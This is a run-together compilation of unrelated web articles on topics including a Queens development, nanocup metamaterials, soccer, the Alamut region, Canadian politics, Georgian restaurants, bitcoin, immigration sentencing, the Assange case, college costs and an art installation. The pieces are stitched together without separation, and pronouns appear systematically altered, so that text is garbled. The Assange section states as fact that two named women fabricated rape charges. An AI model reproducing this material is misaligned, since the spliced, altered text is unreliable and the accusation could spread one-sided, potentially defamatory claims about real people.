The $1 billion Silvercup West development was first proposed for the East River waterfront south of the bridge back in the mid-2000s. Though it has been stalled for years, the proposal has recently been revived, featuring a new concept design while maintaining the previous program. The gargantuan project would feature several towers, new studios for Silvercup, a 2.2 million-square-foot office, retail, and cultural component, 1,000 residences, and 1,600 parking spaces. The historic Silvercup sign would be moved from its current location to face the East River as a centerpiece for the new complex.
The coming development is all but certain to serve as a catalyst for a brand new Silvercup district spanning the blocks between Silvercup West by the river, 23-10 Queens Plaza South to the east, and the Queensboro Bridge to the north. 44th Drive would constitute the southern border, where the street lights are already adorned with signage that foreshadow such development. “Long Island City – Make It Here, Make It Yours,” proclaim the banners, book-ended by the Long Island City Partnership logo at the top and the Silvercup Studios emblem at the bottom. Skyrocketing real estate prices in Long Island City, as well as an upcoming rezoning spearheaded by Mayor Bill de Blasio's administration, make a future Silvercup District inevitable.
When that time arrives, 23-10 Queens Plaza South will find itself surrounded by a vibrant, resurgent neighborhood on all sides. Until then, its residents will have central Long Island City's uncontested front row seats to the spectacle of the Midtown skyline.
14 March 2009 No Comment
Researchers at Rice University have created a metamaterial that could light the way toward high-powered optics, ultra-efficient solar cells and even cloaking devices.
The latest invention was from two excellent students, Nokolay Mirin and Naomi Halas, the former a graduate and the later an award-winning pioneer especially in nanophotonics. The new material collected light from different directions and the emission took place just in a single track. Nanocups are used for making the material and these are defined as cup shaped tiny particles.
In the February edition of the journal, Nano Letters, both the inventors talked about how light bending nanoparticles were created by isolating nanocups. Mirin was into a serious research of making thin gold film having holes of nano size, soon after they recognize that something can be thought about the knocked-out bits in establishing what they wanted. The properties of gold nanocups were identified with the earlier works of the researchers. This was possible only when Mirin suggested the possible way out to collect the nanocups which were isolated by preserving the real material.
Halas, the Rice's Stanley C. Moore Professor in Electrical and Computer Engineering as well as the professor of biomedical engineering and chemistry said that “The truth is a lot of exciting science actually does fall in your lap by accident.” “The big breakthrough here was being able to lift the nanocups off of a structure and preserve their orientation. Then we could look specifically at the properties of these oriented nanostructures.”
What Mirin found was something different and it was about thin layers of gold deposits which were collected from different angles right onto the latex or the polystyrene nanoparticles. This was then randomly distributed over the glass substrate. The particles were embedded by the cups and this along with the dielectric particles were automatically sealed into an elastomer and then were taken off from the substrate. They also said that, “You end up with this transparent thing with structures all oriented the same way.”
Redirection of the scattered light talks in such a way that nothing bounces away from the metamaterial onto the observer's eye. Mirin said that it this which proves the invisibility of the material and also added that, “Ideally, one should see exactly what is behind an object.”
The material should not only retransmit the color and brightness of what is behind, like squid or chameleons do, but also bend the light around, preserving the original phase information of the signal.”
Halas, one of the inventors added to the story telling that the nanocups in the embedded form were known to be the first three-dimensional nanoantennas. This special property acquired by them was due to the presence of plasmons. The plasmonic nanoparticles have electrons within them which resonate with the assistance of the electromagnetic source from the outside. This can be known to be similar to how ripples are created in a pool by the falling of water droplets. These particles absorb as well as emit electromagnetic waves including visible wavelengths and they work similar to how radio antennas work.
The nanocup ensembles have the ability to focus light which comes from any direction to a particular point. They are also known to be the best candidates for creating thermal solar power. A lot of money can be saved on machinery for those solar panels which does not have to track out sun, still can focus light onto the beam which is always said to be on the go.
“In solar cells, about 80 percent of the light passes right through the device. And there's a huge amount of interest in making cells as thin as possible for many reasons.” Halas added up telling that all kinds of power generated from solar energy can be of great benefit.
Halas also said that the transparency of the cell directly depends on the thinning of it. “So ways in which you can divert light into the active region of the device can be very useful. That's a direction that needs to be pursued.”
They also said that transmission of optical signals between the computer chips can be made possible by nanocup metamaterial and it can also enhance the spectroscopy and also wonderful opportunities are provided by the superlenses as well.
“We'd like to implement these into some sort of useful device,” said Halas of their team's next steps. “We would also like to make several variations. We're looking at the fundamental aspects of the geometry, how we can manipulate it, and how we can control it better.”
“Probably the most interesting application is something we not only haven't thought of yet, but might not be able to conceive for quite some time.”
The paper can be found at http://pubs.acs.org/doi/abs/10.1021/nl900208z?prevSearch=mirin&searchHistoryKey
From Technology.am
In the first of two matches Saturday afternoon, Sporting Kansas City defeated Minnesota United FC 1-0 in a closed-door scrimmage.
This game featured the majority of the Sporting KC starters and it was Bernardo Anor's goal in the 8th minute that separated the two squads.
Sporting KC came out with this lineup to start the match.
This was a 4-3-3 that featured Krisztian Nemeth at center attacking midfielder and Anor as the starting left winger. It also featured De Jong over Sinovic on the left side, perhaps an indication as to Vermes' plans for the opening day back line.
Sporting Kansas City got the early lead in the 8th minute with a goal from Anor, who continues to impress this preseason.
8' Goal! Anor volleys home from close range off a corner kick from Zusi. @SportingKC leads @MNUnitedFC 1-0. — SKC Gameday (@SKCgameday) February 28, 2015
That would be the end of the scoring for the day but not the end of the action. Over the next few minutes, Sporting KC dictated the pace but were still susceptible to counters from the Loons, keeping the back line on their toes.
In the 25th minute, Anor went down hard and there was a stoppage in play.
25' Brief break in play after hard challenge on Anor along sideline. He'll continue, as does the first half. pic.twitter.com/rl6KUpp7ej — SKC Gameday (@SKCgameday) February 28, 2015
Fortunately for Sporting, Anor was not seriously hurt and continued for the rest of the game. Sporting had a couple more opportunities the rest of the half but could not put them in as they took a one-goal advantage into halftime.
HALFTIME: @SportingKC takes a 1-0 advantage over @MNUnitedFC into the intermission on an 8th minute goal from Bernardo Anor. — SKC Gameday (@SKCgameday) February 28, 2015
In the second half, Peter Vermes used their substitutions like they were in a real match, going with only three. In the 55th minute, Jacob Peterson came in for Graham Zusi, followed two minutes later by Mikey Lopez coming in for Marcel De Jong.
Minnesota United subbed in several different players throughout the match and had a line change in the second half. This was followed a couple of minutes later by Erik Palmer-Brown coming in for Ike Opara.
Sporting then had one more decent opportunity before the match closed out.
81' Espinoza intercepts and immediately picks out Dwyer alone on goal. Keeper comes up big with sliding stop in 1v1. — SKC Gameday (@SKCgameday) February 28, 2015
This would be the last big action of the match as Sporting KC finished off the 1-0 victory.
The players not used in this afternoon match were used to play the Seattle Sounders in the evening, but this game showed who the first team will feature when the season starts. Obviously nothing will be completely settled until March 8 at 6 p.m. but it's the closest we've seen of the first team in 2015.
Here are the highlights of the match, put together by Minnesota United FC to give you more of a visual.
This article is about the region. For other uses, see Alamut (disambiguation)
The Alamut geographic region (Persian: الموت‎; Alamūt) is a region in Iran including western and eastern parts in the western edge of the Alborz (Elburz) range, between the dry and barren plain of Qazvin in the south and the densely forested slopes of the Mazandaran province in the north. Starting from Qazvin toward Alamut, passing through the first range of hills, curvatures, forms, are significant themes in nature's composition of this area. Two big citadels of Ismailis, Lambsar and Alamut castles, are in this area. Hassan-i Sabbah and their Assassins controlled the area for many years.[1]
History [ edit ]
In 1090 CE, Hassan Sabbah, the leader of Ismailites in Iran, chose the Alamut region as their headquarters to campaign, preach and convert new followers. This proved to be a turning point for the destiny of Alamut Valley. The result of over two centuries of Ismailite stronghold, the region witnessed numerous castles throughout, of which at least 20 "castles" dating back to this era have been identified. The most magnificent castle in the Alamut Valley is the Alamut Castle, which is built on top of a high rock reaching 2163 m above sea level near the Gazor Khan Village. The rock is 200 m high and covers an area of 20 hectares (49 acres); with its steep slope and deep and dangerous ravine, the rock is practically inaccessible and forms a part of the fort's structure. Currently, only ruins of the fort and some towers are apparent, and it is only through archaeological excavation that the main portions can be discovered.[2]
Lords of Alamut Castle who ruled the Nizārī Ismā'īlī state from Alamūt [ edit ]
Today, the leader of the contemporary Ismaili community is the Aga Khan.
Alamut rulers [ edit ]
See also [ edit ]
References [ edit ]
Coordinates:
In the end they never even showed up to hear the final results.
Calgary MP Rob Anders, whose controversies spanned the last 17 years, was beaten Saturday in this rural riding east of Calgary where they had hoped to resurrect their flagging political career.
Anders had sought the Conservative nomination in the new riding of Bow River, which covers a big swath of southern Alberta east of Calgary, including the communities of Strathmore, Brooks, Taber and Vauxhall.
Story continues below advertisement
They decided to make a second attempt after losing a bitterly fought battle in Calgary Signal Hill, which takes in a large part of the constituency of Calgary West that Anders represented for 17 years.
Former provincial cabinet minister Ron Liepert bested Anders in that race and will represent the Conservatives in the next election set for the fall of 2015.
Anders received permission to run for a second nomination. When they announced they were running they said there was still a lot of work to do in Ottawa including personal property and gun rights, cutting taxes and "family values that need to be fought for."
Anders was spotted outside the hotel where the voting took place Saturday morning but by the time the dust had settled they were nowhere to be found.
The mayor of the City of Brooks, Martin Shields, who had labelled Anders a "drop-in candidate", was named the winner.
"I'm absolutely humbled that I'm in this position and thankful for the people who believe in me," Shields told reporters immediately after the win.
"I believed there were strong candidates within the riding and that people had a great choice within the riding. If someone else comes in that's up to the voters to determine if that's a suitable candidate from outside," they added.
Story continues below advertisement
Story continues below advertisement
As for Anders' absence from the final results Shields just shrugged.
"So be it. It's their choice whether they're here or not. Three of us were," they said.
Shields recognized that Anders' entry into the race sparked a lot of public interest - particularly in the media. But they said that wasn't what won the nomination.
"I think there was interest sparked in the media but I think that the people in the communities that I talked to were interested if you knew about them," they said.
"When it came down to buying a membership and going to vote they wanted to look for someone who actually knew about their community."
Anders is known for their strong social conservative views and gained attention for their sometimes inflammatory statements, including their opposition to granting honorary citizenship to Nelson Mandela, branding the South African leader a communist and a terrorist.
Story continues below advertisement
They once compared the 2008 Beijing Olympics to the 1936 Berlin Games, which were held when the Nazis governed Germany.
In 2012, Anders was dropped from the Commons veterans affairs committee after they lashed out at a veterans support group that had criticized them for falling asleep during a committee meeting. They later apologized for saying their critics were NDP "hacks."
David Taras, a political scientist from Mount Royal University, said Anders had a lot going against them coming into the riding including having already lost in Calgary and being from outside.
"He didn't have much political strength or clout or much of an organization," they said.
But the culinary action has especially taken hold in the heart of the Old City. There, behind the gilded and imposing St. George statue in Freedom Square, three restaurants have opened. Strolling the quiet streets, this visitor was pleasantly surprised to come across Ezo, tucked in a residential courtyard. Ezo, its name meaning yard, opened two years ago, and while it's rustic, don't be fooled. One can feast like the 12th-century Queen Tamara there for $25 per person. Many of the flavorful organic ingredients are from the owners' farm.
Proletariat options like the salt-cured jonjoli (bladdernut flowers), staples on any Georgian table, get an unusual twist with familiar walnut garlic sauce. Tender veal in herbs is a customer magnet. Wash it down with glugs of family chacha (grappa) for an authentic accent. Walk another few minutes, on uneven cobblestones and broken sidewalks, past unmarked boutiques and fruit stalls that never seem to shut, and you will find the more upscale Azarphesha, now four years old. With walls of museum-worthy displays showcasing ancient drinking vessels, the restaurant remains of the moment. Yet with its mix of traditional tablecloths and fresh wild posies, the room couldn't feel less pretentious, especially when a table spontaneously burst out in the traditional, emotional polyphonic village songs, as often happens.
Roy Hodgson has said they would put a speculative tenner on their England side to win the World Cup before Friday's draw that will begin the final countdown to their proudest moment in football.
In bullish mood, the England manager also unveiled plans to tap into the performance strategies and psychological strength that helped Team GB record their best Olympic medal haul in a century at London 2012. They will enlist Lord Coe to give their players an insight into coping with pressure and expects the recently hired Dave Reddin, the performance expert who worked with England's 2003 Rugby World Cup winners and 2012 Olympians, to play a key role in fine-tuning their preparations.
While Hodgson underscored the new sense of realism that has surrounded England's chances since they took over on the eve of Euro 2012, they also dared to dream. Careful not to be drawn into setting targets, they were asked if they would put their hypothetical tenner on Brazil to win their sixth World Cup title. "No – I'd put it on England," they replied. "I'd have a chance of losing it on Brazil, so why not put it on the team I want to win it?"
Hodgson arrived at the Costa do Sauípe draw venue on Brazil's north-east coast from Rio de Janeiro, where they had earlier given their seal of approval to England's planned base at the Royal Tulip hotel and their proposed training camp in the shadow of Sugarloaf Mountain.
Although enthusiasm for England's chances was tempered last month by back-to-back friendly defeats at Wembley to Chile and Germany, Hodgson said they would relish the chance to savour their achievement in qualifying. "We are here, we are part of it, that's a great feeling and the draw will be exciting. Like all draws we hope we get one we like the look of, but you take what you get, that's the most important thing."
Hodgson said they were unconcerned by last-minute changes that could see England draw a group that includes the hosts Brazil, Italy and the USA and has maintained they are more worried about where they will play than who they will face.
"One of the things you have to think about in Brazil, from Porto Alegre all the way up to Manaus, is the fact that three games in nine or 10 days is going to be very tough for any team, let alone a European team," they said. "Will we have enough legs, will we have enough running power, will we have enough endurance, will we have enough youth?"
Hodgson, who said the door would remain open for players who could force their way into their thinking between now and June, spoke of a "nice balance" to their squad, both on the pitch and off. "We're not one-dimensional in any way. There are options. I think the emergence of these younger players with slightly different skills to what we had in the past gives us different options," they said, praising the emergence of a side with pace and "counter-attacking threat".
With Rio as their base, the Football Association is hopeful that it will help the players to relax and enjoy being part of the tournament, as well as remaining focused on the task in hand. Hodgson said Reddin, recently hired to target the "marginal gains" that could allow England's players to perform at their peak, would play a big role.  They are likely to be joined by a dedicated sports psychologist brought in to ensure England avoids the familiar feeling of claustrophobic underachievement and penalty shootout trauma that so often accompanies major tournaments.
"All you can do is put all your experience at the players' disposal and make sure they realise the only way you can really feel good coming into a World Cup or coming out of a World Cup is if you go there and play well," said Hodgson.
As the first Englishman to coach a side at the World Cup finals since Glenn Hoddle in 1998, Hodgson said they would feel huge pride when the first game kicked off.
"We'll have had four or five weeks of preparation and we'll be there, we'll be lined up and the national anthem will play. It's a surge of feeling that you can't deny and it's very difficult to describe."Between now and then, there will be a programme of friendlies and a pre-tournament training camp in the USA to fine tune their squad. At one of those get togethers, Hodgson hopes to call on Coe to speak to their players.
"He had to work under the burden of that pressure. When they were the best 1500-metre runner in the world, when they took part in Olympic Games or World Championships they were expected to win, like Jessica Ennis was in London. And that's an enormous pressure, even when you're good enough to do it."
Apple co-founder Steve Wozniak revealed in an interview with CNBC that they too, invested in Bitcoins back to when the price per coin was at $700.
Since early 2017, Bitcoin has tripled its price and recently reaching an all-time high of above $3,000. Though there are still several uncertainties and speculations that Bitcoin is a bubble, Wozniak seems to believe that Bitcoin has some growth factor to it.
Why did they invest?
Wozniak stated during the interview that they aren't investing in Bitcoins for monetary gains. Instead, they are curious as to how the technology works and how other people can make money through it. At that time when they invested, Wozniak made their first investment when Bitcoin was at $700 to which the price dropped at $350.
They were also curious as to how Bitcoin could be used for buying and selling goods as well as how it is being used to pay for services.
Curiosity in its underlying technology
Though their initial Bitcoin investment would have already made them a chunky profit if they sold them at its current price, Wozniak stated that one of their main curiosities was in Bitcoin's underlying technology as the tech genius wanted to know how it works and how it facilitates security of the transactions.
With the increasing interest in Bitcoins, various industries are incorporating the underpinning technology to optimize their existing processes and disrupt their industry.
Future industry applications
According to an interview with Tapscott CEO, Don Tapscott, they think that the Blockchain technology will affect the whole world because it involves powerful protocol that can transfer financial transactions without having to go through powerful third party financial entities like banks.
In fact, Blockchain technology is seen to improve various sectors including finance, entertainment and even politics in the near future.
The Central Court Building in Brooklyn, N.Y. Acting Brooklyn District Attorney Eric Gonzalez has instructed staff to consider modifying sentences and changing offenses for illegal immigrants to help them avoid deportation. (Reading Tom/Flikr)
Alternative Sentencing of Illegal Immigrants Creates ‘Unequal Justice System,' Says Expert
Brooklyn and Baltimore prosecutors have instructed staff to consider alternative offenses and sentence modifications for illegal immigrants to protect them from possible deportation.
Acting Brooklyn District Attorney Eric Gonzalez said in a statement that their new policy aims to “prevent collateral consequences of convictions” for illegal immigrants.
Gonzalez instructed their assistants to consider “alternative offenses the defendant can plead to as well as reasonable modifications to the sentence recommendation.”
The alternative offence should be similar in level and length of sentence to that offered to a citizen defendant, but the charge may be different, Gonzalez said.
“For example, a plea to a misdemeanor trespass may be offered when appropriate instead of a misdemeanor drug offense,” they said.
Art Arthur, a resident fellow in law and policy for the Center for Immigration Studies, said the policies discriminate against American citizens and lawful permanent residents.
“Essentially, it creates two sets of rules: one for those who are here legally and one for those those who are not,” Arthur said.
“I believe that that's just wrong. A guiding principle of this country is that there is equal justice under law,” they said. “In essence, this sets up an unequal justice system.”
Misdemeanors are less serious crimes than felonies and are often punished by penalties such as a fine, a short spell in jail, probation, or community service.
A misdemeanor drug possession charge could also mean mandated drug counseling or treatment.
“The consequences of a misdemeanor conviction can be dire,” said a 2009 report from the National Association of Criminal Defense Lawyers (NACDL).
“A person convicted of a misdemeanor can be denied employment, denied access to a wide array of professional licenses, made ineligible for a student loan, or even expelled from school,” NACDL said. Access to public housing and food assistance can also be affected.
Gonzalez said the policy reaffirms their commitment to “equal and fair justice for all Brooklyn residents.”
Baltimore City State's Attorney Marilyn Mosby has also instructed prosecutors to tread lightly when it comes to illegal immigrants who commit minor, non-violent crimes, according to a memo obtained by the Baltimore Sun.
But Attorney General Jeff Sessions said the special treatment for illegal immigrants “baffles” him.
“They [attorneys] advertise that they will charge a criminal alien with a lesser offense than presumably they would charge a United States citizen,” they said, in a speech on Long Island, N.Y., on April 29.
“It troubles me that we've seen district attorneys openly brag about not charging cases appropriately under the laws of our country, so it provides an opportunity for individuals not to be convicted of a crime that might lead to deportation,” they said.
Sessions said people who come to the United States illegally and commit crimes should be deported.
Home » News (» Roundups) Assange Case: Ny Knows the Girls Made it Up but Doesn't Care Revelations by Assange's Australian barrister James Catlin.
Get It
Try It STOCKHOLM/MELBOURNE (Rixstep) — The charges against Julian Assange were indeed trumped up. Anna Ardin and Sofia Wilén planned it all. They went to the police station asking for advice, knowing the police would turn it into an accusation of rape. They're also the ones who leaked the story to the tabloid Expressen.
This was revealed in a letter written by Assange's Australian barrister to the website Crikey. Recap A bit of a recap first.
Anna Ardin and Sofia Wilén approached the Klara police station in Stockholm on the afternoon of Friday 20 August 2010 to ask questions of the police, purportedly about forcing someone to submit to STD/HIV tests.
The police officers on duty rang up prosecutor on duty Maria Kjellstrand even before the formal interrogation had begun. Kjellstrand - working with no paperwork at all at this point - issued an 'APB' for Assange and had the police search the Stureplan district of Stockholm for Assange, ostensibly to bring them in for questioning (and a tour of Swedish isolation cells).
The formal interrogation of Sofia Wilén was only concluded hours later and the interrogation of Anna Ardin didn't take place until the day after - by telephone.
As seen from Anna Ardin's SMS history, Anna Ardin and Sofia Wilén made the whole thing up - and even decided to leak the story to notorious Swedish tabloid Expressen. The story reached Niklas Svensson and others at Expressen at 19:52.
A colleague of Svensson's rang up Maria Kjellstrand to find out if the story was true - and Kjellstrand, violating the rules of their office, told the reporter that it was.
All of which closely follows Anna Ardin's notorious 'seven-step plans for revenge' and is based directly on it.
A lot of the above has been inferred by pundits and researchers but it is only now that people finally learn the truth. Case Dismissed Expressen did their damnedest - all three of the reporters working overtime on Twitter from the wee hours of Saturday morning - to give the story legs. They truly didn't have much of a story: all they had was the leak by Ardin and Wilén that charges would be filed.
This is something Ardin and Wilén couldn't even have known at the time: they purported to ask the police questions only and it's the prosecutors and not the police who file charges and decide what the crime (if any) is to be - and Kjellstrand still hadn't seen any paperwork at all.
The case caused such a furore that Eva Finné was asked by their boss to look into it. Finné was at the time out in their sommarstuga for the weekend and had the case documents sent to them by messenger. Finné quickly concluded there was no rape charge there whatsover and essentially dismissed the whole thing. Enter Claes Borgström But Claes Borgström knew better. They and their friend and colleague Marianne Ny had been working on expanding the legal concept of rape in Sweden. They were interested in two sweeping changes to current legislation, whereof the most important one is that people themselves no longer decide when they've been raped - their governments do.
The other second change is relatively unimportant - but perhaps more shattering worldwide: almost anything can be considered rape - even and especially nonviolent and consensual acts.
Consensual sex can be rape, according to Borgström and Ny - but the alleged victims don't decide - they do.
The new laws which establish these 'precedents' are not yet on the books - but it's Marianne Ny's intention to make the Assange affair into a test case for that purpose.
In other words: Marianne Ny wants to try Julian Assange for a something that wasn't a crime when it took place. SMS & Twitter The designs of Ardin and Wilén were revealed by their SMS traffic (of which Catlin seems to only have seen those on Ardin's phone) and by Ardin's tweets after the supposed 'rape'. Most likely on advice from Claes Borgström, Ardin tried to remove all those tweets but didn't succeed all too well.
Not that it matters to Marianne Ny and Claes Borgström who've both seen the same evidence and are fully aware the girls made the whole thing up.
But as Borgström already said of Ardin (somewhat incorrectly): 'she's not a jurist'. Borgström and Marianne Ny can namely find rape where there is none. And for this nonsense there's today an international red notice out in 188 countries.
The mind boggles.
But then neither Ardin nor Wilén complained to the police but rather 'sought advice', a technique in Sweden enabling citizens to avoid just punishment for making false complaints. They sought advice together, having collaborated and irrevocably tainted each other's evidence beforehand. Their SMS texts to each other show a plan to contact the Swedish newspaper Expressen beforehand in order to maximise the damage to Assange.
- James Catlin Ramifications The above doesn't affect the Assange case at all. Ardin and Wilén could both be convicted for bringing false accusations - all the evidence needed is already there - but that's not likely to happen. Women who make up rape charges get sent to prison in Britain but the feminist sisters usually protect their own in Sweden - their crime in this case carries a sentence of two years in prison but Wilén's been swallowed up by the earth and Ardin's in the middle east.
Julian Assange is being harassed for slighting the feelings of two groupies who worshipped them before and after the alleged rapes and he's being hunted for something that's definitely not rape and not even a crime yet.
Something that probably didn't even happen as the girls are known to have made the whole thing up.
But don't expect such trivialities to affect Marianne Ny, Claes Borgström, the Swedish courts, or the Swedish feminists.
The prosecutor could achieve this broadening of the law during Assange's trial so they can be convicted of a crime that didn't exist at the time they allegedly committed it. They would need to. There is no precedent for this. The Swedes are making it up as they go along.
- James Catlin Julian Assange will surely learn that considering what WikiLeaks has published, he's got a few enemies in the Pentagon, the CIA, and the White House. Sweden began an investigation into rape which was later dismissed. Assange was even denied residence in Sweden. One can only speculate to what extent the security agencies of the US were involved. And considering the obvious interest of the US to silence WikiLeaks, is it likely Assange will have an accident of the 'Boston brakes' kind in the coming years? Or will they be snared with compromising information of the 'honey trap' kind?
- 'Drozd' at Flashback 23 October 2010 See Also
Crikey: Assange Lawyer Speaks
Industry Watch: Assange Update 2010-12-02
Industry Watch: Assange Case: Evidence Destroyed Over and Over Again
WikiLeaks: Support WikiLeaks
Rixstep: Assange/WikiLeaks RSS Feed
Radsoft: Assange/WikiLeaks RSS Feed
By Staff
Three Kuwaiti drug addicts and their massive dog were in their car heading out of their capital when a police patrol waved them to stop after suspecting their behavior.
The three quickly put the narcotics in a plastic bag and hid it under the dog before asking it to lie on the bag and stay there.
When the cops told them to get out to search the car, one of them warned the police not to come near the dog on the grounds it is savage and could be easily irritated.
“But the police insisted on searching the car…they were surprised to find that the dog is very calm and obedient…when they led the dog out of the car, they found the bag which contained hashish and other drugs,” Alanba daily said.
There are four types of undergraduate college in the USA and many more ways to get a degree.
Graduation cap (Photo11: File photo) Story Highlights College often becomes a six-year self-discovery journey.
Don't start college right away. Get a job and see what the real world looks like.
Go to a community college for two years.
I can't count how many roundtable discussions I've heard asking whether college is still worth the cost. They are important debates; college can be expensive. But most leave out an important point: There is more than one way to go to college.
I graduated from college in 2008, and think I have a pretty good grasp of the challenges today's new grads face. The biggest reason I see so many young people getting frustrated with college isn't necessarily the cost. It's that they're doing college wrong.
Tradition says you graduate high school at age 18 and head straight to a university. I've found that less than 30% of 18-year-olds are emotionally prepared for college, and a smaller percentage have a reasonable idea about what they want to do for a career.
This sets legions of new students on a devastating path: Start college at age 18 studying your childhood dream. Change your major at age 19 when you realize it requires too much math. Change it again at age 20 when you encounter a mean professor, and once more at 21 to match your boyfriend's class schedule. Eventually stick with a major at 23, graduate at 24, and at 26, finally figure out what you really want to do for a career, which invariably has no relation to your degree.
I see this over and over again. In the end, college becomes a six-year self-discovery journey -- a worthy cause, but not one most people can afford to spend tens of thousands of dollars on.
The other problem I see in the "is college worth it?" debate is that all schools are lumped into one category called "college." That's wrong. There are four types of undergraduate colleges in America:
Community/junior
State four-year
Private four-year
For-profit
These are very different institutions offering very different services at wildly different prices. Picking which one is right for you -- or mixing and matching at the right times -- is one of the most important decisions you'll make in your college career.
I can't offer individual advice, because everyone has different goals, backgrounds, and financial means. What worked for me might not work for you, and what works for you might not work for someone else.
But if I had to come up with a blanket college plan for the average non-rich American graduating from high school, it would look like this.
1. Don't start college right away. Get a job and see what the real world looks like.
One of life's cruel ironies is that people's confidence in how well they think they understand the world peaks at age 18. Eighteen-year-olds are unshakably certain about what they want out of life, what kind of career they want, and how they plan on getting there. Some truly have this down; most don't. I can count on one hand the number of 18-year-olds I've met who were ready to make rational decisions about their career path.
So, after you graduate high school, get a job. It'll probably be low pay for menial, boring work. That's fine. You're young. See what working 40 hours a week feels like. See what paying bills feels like. Learn what dealing with a boss is like, how to talk to customers, how to file taxes, and what your co-workers' lives are like. Take a road trip. You'll learn more than you can imagine doing this. Do it for a couple years, and the combination of aging and working will give you a better sense of what you want to do for a career than you had when you were 18.
2. Go to a community college for two years
No matter what you major in, you're going to need a bunch of general-ed requirements -- a course in basic writing, some level of math, natural sciences, humanities, and maybe a foreign language.
Get these out of the way at an accredited local community college. Most offer an adequate level of education at a rock-bottom price. Take Orange Coast College, one of the largest community colleges in California. Classes cost $46 per credit, which is less than $150 for a typical semester-long class. A full courseload will set you back $750 per semester -- let's call it $2,500 a year with books and other fees (this varies by state). Maybe you still need to borrow for this. That's fine; it's still a fraction of the cost of four-year schools.
Keep working throughout this period. I heard so many people say, "I can't work and go to school at the same time." Yes, you can. What you can't do is work, go to school, and have the social life of Paris Hilton. You might have to stay up late studying and wake up early to go to work. Welcome to the real world. The 20-year-old you who borrows tens of thousands of dollars to play beer pong five hours a day is despised by the 30-year-old you who has to accept a horrible job to pay it back.
3. Transfer to a state college
Once you have a real-world sense of what you want to do for a career, transfer to a state college to finish your degree. I found transfer students had a stigma, which made no sense to me; they were often the most responsible and prepared students I met. And no one looking at your resume ever needs to know you transferred. If you go to a community college for two years and then transfer to UCLA, your diploma will be from UCLA.
Most states have public universities that offer first-class educations at a fraction the price of private schools. Private schools can be wonderful if you have rich parents or a scholarship. For everyone else, grasp reality with both hands. For reasons I don't fully comprehend, the same people who understand why they can't afford a Ferrari think it's reasonable to attend Swarthmore. Accepting the reality of your financial situation will save you tens of thousands of dollars.
Pick a degree that you are both interested in and can provide the income you desire to be happy. If I picked a major based solely on what I found the most interesting, I would have studied military history or something. But there's not much hope for a career in that field, so I chose a major I found interesting and (I hoped) offered marketable job skills. This isn't abandoning your dream. I read a lot of military history books today. But one of the main reasons people think college isn't worth the cost is because they major in something they find fascinating (or easy), but that ultimately makes them no more employable than when they began. That's an expensive choice.
Keep working during this period. Network like crazy, and intern in whatever field you're heading into. You're about to enter one of the most competitive job markets of all time. Find a way to set yourself apart.
Maybe you disagree with all of this. That's fine -- this is just my perspective. But most people should be able to follow a similar path and obtain a bachelor's degree without a crippling debt load. When I hear horror stories about people graduating from college with $120,000 in debt, I think two things: 1) That's unfortunate, and 2) you did it wrong.
Good luck.
The Motley Fool is a USA TODAY content partner offering financial news, analysis and commentary designed to help people take control of their financial lives. Its content is produced independently of USA TODAY.
&amp;amp;amp;lt;SCRIPT language='JavaScript1.1'SRC="http://ad.doubleclick.net/adj/N4538.USAToday/B2304017.8;abr=!ie;sz=550x300;ord=[timestamp]?"&amp;amp;amp;gt;&amp;amp;amp;lt;/SCRIPT&amp;amp;amp;gt;&amp;amp;amp;lt;NOSCRIPT&amp;amp;amp;gt;&amp;amp;amp;lt;AHREF="http://ad.doubleclick.net/jump/N4538.USAToday/B2304017.8;abr=!ie4;abr=!ie5;sz=550x300;ord=[timestamp]?"&amp;amp;amp;gt;&amp;amp;amp;lt;IMGSRC="http://ad.doubleclick.net/ad/N4538.USAToday/B2304017.8;abr=!ie4;abr=!ie5;sz=550x300;ord=[timestamp]?" BORDER=0 WIDTH=550 HEIGHT=300ALT="Advertisement"&amp;amp;amp;gt;&amp;amp;amp;lt;/A&amp;amp;amp;gt;&amp;amp;amp;lt;/NOSCRIPT&amp;amp;amp;gt;
Read or Share this story: http://usat.ly/1hLod7X
November 2, 2018
Hey folks, I wanted to put out a quick announcement and let you know what we've been up to since the last one. Originally we were going to put out a smaller update next, but along the way we ended up deciding to go ahead and finish up the intro/tutorial for the next update as well. The intro/tutorial will help introduce players to the world, as well as introduce many of the gameplay mechanics that you'll be using for the rest of the game. Signs of Life does some things a bit different than other games, so we feel like it is super important to make sure that players understand how the game functions before they get dropped on the planet that they'll spend the majority of their time on.Here is what we've been working on for the intro/tutorial, but keep in mind that much of it is still a work in progress:You'll start the intro in your room, aboard the U.N. Hephaestus, a massive colony ship designed to travel to a new earth-like planet many lightyears from home. You'll wake up and find out that while en-route to the new planet, some signs of life were detected on a nearby asteroid and you've been tasked with investigating.Once you get dressed, you'll take a grav lift down to the main Barracks corridor, and then an elevator to the Supply Room.While on the Hephaestus, you'll get your wrist mounted MEG tool installed, and run through a series of diagnostics which will teach you how to use the various functions.One of the gameplay mechanics we want to make sure players understand by the end of the tutorial is the way ammo works, so as part of the tutorial you'll need to use a new tool we've created called the Thermo-Thrower. As part of the tutorial, you'll need to put out a fire as well as melt some ice on an airlock door.But of course the Thermo-Thrower isn't only a tool, and it can be used for more... destructive purposes. However, because the U.N. Hephaestus frowns upon violence and destruction, you might want to avoid causing too much trouble with it.This is just some of what we've been working on, and in the next announcement we'll cover a bit about what happens once you leave the Hephaestus and start scouting for signs of life on the nearby asteroid... As always, we love to hear from you folks, so don't be shy. Let us know what you think in the comments, the Steam discussion forums and on the official Discord channel.
by
Scottish artist Sandy Smith has gotten loads of well-deserved press and internet buzz around their brilliant Computer Installations project, but their site showcases a ton of interesting tech and socially-tinged installation work, as well as some awesome insight into each piece from the artist himself.
For Computer Installations, including the obsolescent beauty of “Mauritian Sunset”, pictured below, they took old computer monitors, donated by their alma mater, the Glasgow School of Art, and turned them into gorgeous large-scale installation pieces.
Eye-grabbing from the front and equally intriguing from the back. I love the “technology behind the curtain” vibe; the allusion toward so many beautiful things whose veneer faces us while the nuts and bolts of how their allure is maintained is hidden. The door also intrigues me. You don't have to travel around the outside of the entire piece to see both the gilded and the mechanical side; there's a passageway right there in the middle, a portal, and Smith invites us to openly transverse between the two. This way we see the honest connection between the colourful light and all those dull, grey wires that are working so hard to create it. They might not be as pretty or as celebrated, but they're responsible for all the shiny glory shimmering on the other side.
For “Green/Blue Horizontal”, inspired by the ubiquitous Windows wallpaper “Bliss”, they created a walk-in corner installation from more than 60 computers. Programmed to glow blue and green, people could walk inside the amazing luminescence created by the piece and find some bliss of their own.
But that's just the beginning. In their own description of their installation work “Sapere Aude”, Smith's flair for the written explanation really kicks in. This guy isn't just an artistic bright light, he's also self-deprecating and funny as hell:
